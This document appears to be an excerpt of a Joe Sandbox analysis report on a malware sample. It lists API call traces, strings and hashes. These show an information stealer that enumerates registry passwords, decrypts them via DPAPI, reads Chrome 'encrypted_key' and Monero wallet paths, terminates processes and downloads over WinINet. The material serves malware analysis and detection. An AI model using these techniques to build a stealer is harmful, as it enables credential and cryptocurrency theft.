                                • CloseHandle.KERNEL32(00000000,?,?), ref: 009D45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID: %hs
                                • API String ID: 3729781310-2783943728
                                • Opcode ID: 11e1db364d5c3892d3357e0753d00d9a5ed4b94082c18a65a2f68b96378de264
                                • Instruction ID: 3b5fd4063015e6521fcdb1ef5a27a4c9d98127c501f5d92bcb37fa3c9c9d56b5
                                • Opcode Fuzzy Hash: 11e1db364d5c3892d3357e0753d00d9a5ed4b94082c18a65a2f68b96378de264
                                • Instruction Fuzzy Hash: B6315E72A40245BBDB20DBE4EC85FDEB77CAF44700F104555FA09AB280EF70AA458BA5
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE07D
                                • lstrcat.KERNEL32(?,?), ref: 009CE098
                                • lstrcat.KERNEL32(?,?), ref: 009CE0AC
                                • lstrcat.KERNEL32(?,010BA8C0), ref: 009CE0C0
                                • lstrcat.KERNEL32(?,?), ref: 009CE0D4
                                • lstrcat.KERNEL32(?,010CDAF0), ref: 009CE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009CE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 534f2adc497f8f660e9c81c9c0a1987463f7c0584abab9157f4b16e78e3b320e
                                • Instruction ID: a3d81def13dbb1847cc56227656dc0de694b5ff16056836e72efe2b80434e46b
                                • Opcode Fuzzy Hash: 534f2adc497f8f660e9c81c9c0a1987463f7c0584abab9157f4b16e78e3b320e
                                • Instruction Fuzzy Hash: D6417A71D101189BCB25EF64DE88BDD73B8FF88310F5449A8B90AA7251DF309F858B91
                                APIs
                                  • Part of subcall function 009B77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009B7805
                                  • Part of subcall function 009B77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009B784A
                                  • Part of subcall function 009B77D0: StrStrA.SHLWAPI(?,Password), ref: 009B78B8
                                  • Part of subcall function 009B77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B78EC
                                  • Part of subcall function 009B77D0: HeapFree.KERNEL32(00000000), ref: 009B78F3
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009B7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 009B7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 009B7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 009B7AF0
                                • wsprintfA.USER32 ref: 009B7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B7B47
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009B7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: 58e89171c279924a35aa62c39d07504605e642fecd3ba6024ba3377d13347f44
                                • Instruction ID: 35bc3af662a21b99d867f7c1e34c1b1f3b288fa23b9375e5d589c6b88a859f71
                                • Opcode Fuzzy Hash: 58e89171c279924a35aa62c39d07504605e642fecd3ba6024ba3377d13347f44
                                • Instruction Fuzzy Hash: FD31B272A00254AFCB11DBE8DE84AEFF779EBC4724B140619E50AA7200DF70ED05DBA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8243
                                • lstrlen.KERNEL32(00000000), ref: 009C8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8297
                                • lstrlen.KERNEL32(00000000), ref: 009C82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C82EB
                                • lstrlen.KERNEL32(00000000), ref: 009C8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8337
                                • lstrlen.KERNEL32(00000000), ref: 009C8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 028d5782cf6b75397813971024daebe6a09e7704ff527814b8f5e2608ec1349d
                                • Instruction ID: ea22b3b04d6a670d0e5351ed136b8ce1abc7e3ee3aa28e7924217a0e720e94c2
                                • Opcode Fuzzy Hash: 028d5782cf6b75397813971024daebe6a09e7704ff527814b8f5e2608ec1349d
                                • Instruction Fuzzy Hash: 2A517E719006029BEB14DF68DA98BABB7A8EF44750F114918ED06EB244EF34ED50CBE1
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009B7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009B784A
                                • StrStrA.SHLWAPI(?,Password), ref: 009B78B8
                                  • Part of subcall function 009B7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 009B775E
                                  • Part of subcall function 009B7750: RtlAllocateHeap.NTDLL(00000000), ref: 009B7765
                                  • Part of subcall function 009B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009B778D
                                  • Part of subcall function 009B7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009B77AD
                                  • Part of subcall function 009B7750: LocalFree.KERNEL32(?), ref: 009B77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B78EC
                                • HeapFree.KERNEL32(00000000), ref: 009B78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 009B7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: dac446079211f9546f949b45ab0f0173cd26a20d761e9d19f1a525489ca3a401
                                • Instruction ID: 64425579d573fa919845d92169f21ab04187fc79bb8cc550adaeb73eb9a387ca
                                • Opcode Fuzzy Hash: dac446079211f9546f949b45ab0f0173cd26a20d761e9d19f1a525489ca3a401
                                • Instruction Fuzzy Hash: F9711FB5D0021DABDB10DF95DD84AEEF7B9EF48310F10466AE609A7200EA356E85CB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 009B1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 009B1173
                                • RegCloseKey.ADVAPI32(?), ref: 009B117D
                                Strings
                                • wallet_path, xrefs: 009B116D
                                • SOFTWARE\monero-project\monero-core, xrefs: 009B114F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 8c4ca768a35ac5cedb36df57ec9d479a61e86bd7e509b1d180596e39ab332ba8
                                • Instruction ID: 49f99a66facdbd743f86eddd50677ac5ac3cce225dad05de456c87a1897943c2
                                • Opcode Fuzzy Hash: 8c4ca768a35ac5cedb36df57ec9d479a61e86bd7e509b1d180596e39ab332ba8
                                • Instruction Fuzzy Hash: F9F03075640388BBD7109BE5AC8DFEA7B7CEB44B15F100154FE09E7281EAB05A4887A0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 009B9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 009B9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 009B9EA7
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • lstrcpy.KERNEL32(00000000,009E4C48), ref: 009B9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 965af9446fc930325ad7b424b1ee8dc9555f63790cad0aca1e79b42ef4925356
                                • Instruction ID: b894068a8d1753613b833d3435b7e361da3ff798e8e3ba536e4d2876a890c8e3
                                • Opcode Fuzzy Hash: 965af9446fc930325ad7b424b1ee8dc9555f63790cad0aca1e79b42ef4925356
                                • Instruction Fuzzy Hash: 0A51B331A102499BDB10EFA9DE85BDE77A8EF80334F154465FA49EB281DB70ED058BD0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009B565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B5661
                                • InternetOpenA.WININET(009DCFEC,00000000,00000000,00000000,00000000), ref: 009B5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 009B5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 009B56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 009B56E1
                                • InternetCloseHandle.WININET(?), ref: 009B56FA
                                • InternetCloseHandle.WININET(00000000), ref: 009B5701
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 51001a10cd3bd46b7470270f3281361981527272d563eeb3fcfb9284356e6f8d
                                • Instruction ID: a1ef8fdff50e4eef98a6b61fe06ce98259f4b1e745609c53c467fa2e7f84e421
                                • Opcode Fuzzy Hash: 51001a10cd3bd46b7470270f3281361981527272d563eeb3fcfb9284356e6f8d
                                • Instruction Fuzzy Hash: 72417F70A00605EFDB24CF55DD88FDAB7B8FF48714F1580A9E9089B2A1DB719D42CB94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 009D4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 009D47AB
                                • CloseHandle.KERNEL32(00000000), ref: 009D47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D47C0
                                • CloseHandle.KERNEL32(00000000), ref: 009D47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 3f61f905b37fe67889408b46e00c960a358644bf9320eb3035f974b4e8cbabbc
                                • Instruction ID: c58d094b923a5df056f212745f82f84528a389b40511e4700bba1a79a20fa69e
                                • Opcode Fuzzy Hash: 3f61f905b37fe67889408b46e00c960a358644bf9320eb3035f974b4e8cbabbc
                                • Instruction Fuzzy Hash: 7901B571681614ABE7209B609CC9FEE77BCEB48752F004581F909EA281EF708D848AA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C846C
                                • lstrlen.KERNEL32(00000000), ref: 009C84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C84E9
                                • lstrlen.KERNEL32(00000000), ref: 009C84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C852E
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 72bd1275c094d01950ff1f7d3654a43a8212a5d9eb19cd46c08ea90b080b479b
                                • Instruction ID: c0a465a4986bf5d0b464348967c3e671f5a4bd664fa510fe8e2a9cb0f09e6379
                                • Opcode Fuzzy Hash: 72bd1275c094d01950ff1f7d3654a43a8212a5d9eb19cd46c08ea90b080b479b
                                • Instruction Fuzzy Hash: A8515B719002429FCB24DF68D984F9BB7B9EF84310B25849DE846EB255EF70E9418B91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009D2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D292C
                                • RegOpenKeyExA.ADVAPI32(80000002,010BBDA8,00000000,00020119,009D28A9), ref: 009D294B
                                • RegQueryValueExA.ADVAPI32(009D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 009D2965
                                • RegCloseKey.ADVAPI32(009D28A9), ref: 009D296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: a422eeb27c327e91e451009d5edf9ff80c4c74ecf67ba219114039c1850cbaac
                                • Instruction ID: 79f7328b64e61b575091c8f5b416926816f7340cbd8fa3ac7a363092c3cf8d8f
                                • Opcode Fuzzy Hash: a422eeb27c327e91e451009d5edf9ff80c4c74ecf67ba219114039c1850cbaac
                                • Instruction Fuzzy Hash: AA01D475640394ABD320CBA0DC99FFB7BBCEB48755F104059FE49DB341EA3159088790
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009D2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D289C
                                  • Part of subcall function 009D2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009D2925
                                  • Part of subcall function 009D2910: RtlAllocateHeap.NTDLL(00000000), ref: 009D292C
                                  • Part of subcall function 009D2910: RegOpenKeyExA.ADVAPI32(80000002,010BBDA8,00000000,00020119,009D28A9), ref: 009D294B
                                  • Part of subcall function 009D2910: RegQueryValueExA.ADVAPI32(009D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 009D2965
                                  • Part of subcall function 009D2910: RegCloseKey.ADVAPI32(009D28A9), ref: 009D296F
                                • RegOpenKeyExA.ADVAPI32(80000002,010BBDA8,00000000,00020119,009C9500), ref: 009D28D1
                                • RegQueryValueExA.ADVAPI32(009C9500,010CE978,00000000,00000000,00000000,000000FF), ref: 009D28EC
                                • RegCloseKey.ADVAPI32(009C9500), ref: 009D28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 09feef2c4746cce558ed08ae73e24cd669baf28e887aac666819402d0de7a847
                                • Instruction ID: 6af4d17866543d7fa2b99ddc72605cf4d16ffe8b669dc724e12f1c4bc6160c05
                                • Opcode Fuzzy Hash: 09feef2c4746cce558ed08ae73e24cd669baf28e887aac666819402d0de7a847
                                • Instruction Fuzzy Hash: A601A271640248BBD720DBA4AC89FAA777DEB44316F004555FE08DB391DE70594497E0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 009B723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 009B7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009B72C3
                                • HeapFree.KERNEL32(00000000), ref: 009B72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 009B7329
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: e88904bff31029d739d9da437cd07bad91f8868f4c90b10217937e6bae749b3c
                                • Instruction ID: e032791677cf0e43bc305b584c467034287bfa893f4d27df99aec4ecbd8b70fd
                                • Opcode Fuzzy Hash: e88904bff31029d739d9da437cd07bad91f8868f4c90b10217937e6bae749b3c
                                • Instruction Fuzzy Hash: 7C413C717056069BDB20CFA9ED84BEAF3E8EB84325F1446A9EC5DCB351E631E9009B50
                                APIs
                                • memset.MSVCRT ref: 009CD7D6
                                • RegOpenKeyExA.ADVAPI32(80000001,010CDD30,00000000,00020119,?), ref: 009CD7F5
                                • RegQueryValueExA.ADVAPI32(?,010CED08,00000000,00000000,00000000,000000FF), ref: 009CD819
                                • RegCloseKey.ADVAPI32(?), ref: 009CD823
                                • lstrcat.KERNEL32(?,00000000), ref: 009CD848
                                • lstrcat.KERNEL32(?,010CEE88), ref: 009CD85C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: dadf2c32715988031efcffc324142fd27f3ab7490d7cbdfe3480c9bae3af6011
                                • Instruction ID: 3dab51010986b611afde7957cf50ba4a99d9da6b37f56a8abe6c96b1cffe5fde
                                • Opcode Fuzzy Hash: dadf2c32715988031efcffc324142fd27f3ab7490d7cbdfe3480c9bae3af6011
                                • Instruction Fuzzy Hash: AE415275A1014C9FCB54EF64ED86FDE7778EF94304F404064B509A7291EE34AA858F91
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 009B9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009B9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009B9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: e421bab3d9ce9cddf6e995a4051366e38a7b790b7a3de40aab4dbb88884b2eb3
                                • Instruction ID: abca8505e43d8fc4499f4ff3ecb0fa3d0d65e0ae5ce1e23ac501184390e137c7
                                • Opcode Fuzzy Hash: e421bab3d9ce9cddf6e995a4051366e38a7b790b7a3de40aab4dbb88884b2eb3
                                • Instruction Fuzzy Hash: D641C171A202499BCF21EFA5DE857EE77B8EFD5324F044464FA55AB292DA30ED04C780
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 009CEA61
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CEA7A
                                • lstrcat.KERNEL32(?,010C8928), ref: 009CEA8D
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CEA9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 9c72e5ded6a1b079bdfe9d3d79995e54cbcf0f3ff401d465a663392d7ba3a3a9
                                • Instruction ID: da7c2bbdbfebab9df47223a30c35d464689c2704188a0c025c472aaad82fb6b0
                                • Opcode Fuzzy Hash: 9c72e5ded6a1b079bdfe9d3d79995e54cbcf0f3ff401d465a663392d7ba3a3a9
                                • Instruction Fuzzy Hash: 7D418A71910159AFCB55EF64DE82FED7378FFC8310F404468B61AAB291DE709E448B51
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CECDF
                                • lstrlen.KERNEL32(00000000), ref: 009CECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CED1D
